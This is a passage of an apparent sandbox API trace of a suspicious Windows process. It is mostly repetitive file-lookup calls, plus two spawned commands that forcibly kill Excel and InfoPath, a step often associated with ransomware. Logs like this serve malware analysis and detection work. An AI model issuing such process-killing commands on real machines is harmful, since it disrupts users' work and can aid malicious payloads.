"c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12451ae8 | out: lpFileInformation=0x12451ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.213] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12451b38 | out: lpFileInformation=0x12451b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.214] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.214] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12451b88 | out: lpFileInformation=0x12451b88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.214] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.214] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12451bd8 | out: lpFileInformation=0x12451bd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.214] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.214] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12451c28 | out: lpFileInformation=0x12451c28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.214] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.214] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12451c78 | out: lpFileInformation=0x12451c78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.215] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.215] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248a1a0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0204.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451cc8 | out: lpFileInformation=0x12451cc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0204.215] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a270, nSize=0x64 | out: lpBuffer="") returned 0x35 [0204.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451d18 | out: lpFileInformation=0x12451d18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0204.215] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0204.215] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0204.216] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0204.216] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0204.216] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0204.216] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0204.216] GetEnvironmentStringsW () returned 0x8ea900* [0204.217] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0204.217] GetCurrentProcess () returned 0xffffffff [0204.217] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457a10, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457a10*=0x154) returned 1 [0204.217] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457a14, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457a14*=0x158) returned 1 [0204.218] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12457a18, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12457a18*=0x130) returned 1 [0204.218] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im excel.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12490a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im excel.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0xa08, dwThreadId=0x554)) returned 1 [0204.269] CloseHandle (hObject=0x13c) returned 1 [0204.269] CloseHandle (hObject=0x130) returned 1 [0204.269] CloseHandle (hObject=0x158) returned 1 [0204.269] CloseHandle (hObject=0x154) returned 1 [0204.269] CloseHandle (hObject=0x144) returned 1 [0204.269] CloseHandle (hObject=0x138) returned 1 [0204.269] CloseHandle (hObject=0x134) returned 1 [0204.271] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0205.988] SetEvent (hEvent=0x150) returned 1 [0205.988] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0205.988] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x12467a40, lpExitTime=0x12467a48, lpKernelTime=0x12467a50, lpUserTime=0x12467a58 | out: lpCreationTime=0x12467a40, lpExitTime=0x12467a48, lpKernelTime=0x12467a50, lpUserTime=0x12467a58) returned 1 [0205.989] CloseHandle (hObject=0x140) returned 1 [0205.989] SetEvent (hEvent=0x128) returned 1 [0205.989] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0206.008] SetEvent (hEvent=0x150) returned 1 [0206.008] SetEvent (hEvent=0x128) returned 1 [0206.008] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c410, nSize=0x64 | out: lpBuffer="") returned 0x35 [0206.008] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447db8 | out: lpFileInformation=0x12447db8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.009] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.009] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12447e08 | out: lpFileInformation=0x12447e08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.009] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.009] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447e58 | out: lpFileInformation=0x12447e58*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.010] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.010] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12447ea8 | out: lpFileInformation=0x12447ea8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.010] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.010] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12447ef8 | out: lpFileInformation=0x12447ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.010] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.010] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12447f48 | out: lpFileInformation=0x12447f48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.010] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.011] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12447f98 | out: lpFileInformation=0x12447f98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.011] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.011] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12496008 | out: lpFileInformation=0x12496008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.011] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.011] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12496058 | out: lpFileInformation=0x12496058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.011] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.011] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124960a8 | out: lpFileInformation=0x124960a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.011] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.012] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124960f8 | out: lpFileInformation=0x124960f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.012] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.012] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12496148 | out: lpFileInformation=0x12496148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0206.012] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0206.012] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247c4e0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0206.012] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12496198 | out: lpFileInformation=0x12496198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0206.012] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c5b0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0206.013] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124961e8 | out: lpFileInformation=0x124961e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0206.013] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0206.013] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0206.013] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0206.013] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0206.013] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0206.013] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0206.014] GetEnvironmentStringsW () returned 0x8ea900* [0206.014] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0206.014] GetCurrentProcess () returned 0xffffffff [0206.014] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449f20, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449f20*=0x144) returned 1 [0206.014] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449f24, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449f24*=0x154) returned 1 [0206.015] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449f28, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449f28*=0x158) returned 1 [0206.015] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im infopath.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12487500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im infopath.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0xf60, dwThreadId=0xe68)) returned 1 [0206.054] CloseHandle (hObject=0x130) returned 1 [0206.054] CloseHandle (hObject=0x158) returned 1 [0206.054] CloseHandle (hObject=0x154) returned 1 [0206.054] CloseHandle (hObject=0x144) returned 1 [0206.054] CloseHandle (hObject=0x140) returned 1 [0206.055] CloseHandle (hObject=0x134) returned 1 [0206.055] CloseHandle (hObject=0x138) returned 1 [0206.055] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0207.775] SetEvent (hEvent=0x150) returned 1 [0207.775] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0207.775] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x1249e080, lpExitTime=0x1249e088, lpKernelTime=0x1249e090, lpUserTime=0x1249e098 | out: lpCreationTime=0x1249e080, lpExitTime=0x1249e088, lpKernelTime=0x1249e090, lpUserTime=0x1249e098) returned 1 [0207.776] CloseHandle (hObject=0x13c) returned 1 [0207.777] SetEvent (hEvent=0x128) returned 1 [0207.777] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0207.793] SetEvent (hEvent=0x150) returned 1 [0207.793] SetEvent (hEvent=0x128) returned 1 [0207.794] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a340, nSize=0x64 | out: lpBuffer="") returned 0x35 [0207.794] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451d68 | out: lpFileInformation=0x12451d68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0207.795] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, 